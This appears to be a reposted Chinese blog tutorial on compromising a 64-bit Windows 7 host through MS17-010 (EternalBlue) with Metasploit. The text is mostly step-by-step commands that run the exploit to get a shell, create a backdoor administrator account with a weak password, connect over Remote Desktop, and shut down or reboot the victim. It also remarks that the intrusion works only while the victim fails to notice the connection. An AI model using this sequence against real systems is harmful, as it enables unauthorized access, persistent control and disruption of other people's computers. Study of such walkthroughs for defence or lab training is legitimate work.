利用MS17-010渗透win7(64位)
生活随笔
收集整理的這篇文章主要介紹了
利用MS17-010渗透win7(64位)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
這里是接著之前一篇"利用MS17-010滲透win7(32位)"的姊妹篇,想了解win7(32位)如何利用永恒之藍滲透的請點擊利用MS17-010滲透win7(32位)
Win7x64的滲透,我們就可以不用下載利用模塊了,kali里已經幫你集成好了 我這里的攻擊機(192.168.1.222),靶機(192.168.1.111),記得靶機關閉防火墻滲透流程
權限提升利用
滲透流程:
1.運行postgresql 數據庫
root@kali:~# service postgresql start2.打開msf
root@kali:~# msfconsole3.掃描靶機系統是否存在漏洞
- 使用模塊:
- 查看配置信息:
- 設置目標IP
- 進行掃描:
發現目標系統存在“永恒之藍”漏洞
3.搜索ms17-010漏洞利用模塊
msf > search ms17-0104.use模塊
msf > use exploit/windows/smb/ms17_010_eternalblue5.查看需要配置的信息
msf exploit(windows/smb/ms17_010_eternalblue) > show options6.set 靶機(rhost) IP,這里不需要使用反彈shell模塊
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.1117.exploit或run,成功拿到shell
msf exploit(windows/smb/ms17_010_eternalblue) > exploit權限提升利用:
(1)創建用戶,加至管理組
C:\Windows\system32>net user 1stPeak 123456 /add C:\Windows\system32>net localgroup administrators 1stPeak /add我們去靶機上看看:
(2)打開遠程桌面服務
(3)使用添加的管理員賬戶1stPeak進行遠程桌面
root@kali:~# rdesktop 192.168.1.111:3389- 比較麻煩的是遠程桌面,必須要當前登陸用戶同意或者默認不選擇30s才可以
- 我想過關閉UAC,但是無效
沒有找到cmd命令開啟多用戶連接遠程桌面,因此,遠程桌面利用條件也只有:
(1)對方沒有看到自己桌面被連接信息
(2)對方已經使用可以多個用戶同時登陸遠程桌面
補充一下開啟多個用戶登陸遠程桌面的簡單方法:
打開本地組策略編輯器,依次展開 【計算機配置】-【管理模板】-【Windows組件】-【遠程桌面服務】-【遠程桌面會話主機】-【連接】-【標準】雙擊【限制連接的數量】(4)如果你單純想露一手,就關機或者重啟吧(目前這個看運氣,有一定幾率會出現執行失敗)
60s后關機 shutdown -s -t 6060s后重啟 shutdown -r -t 60取消關機或重啟 shutdown -a總結
以上是生活随笔為你收集整理的利用MS17-010渗透win7(64位)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 消息称《圣剑传说》游戏将登陆 Xbox
- 下一篇: 全球用户破 100 万,Opera 旗下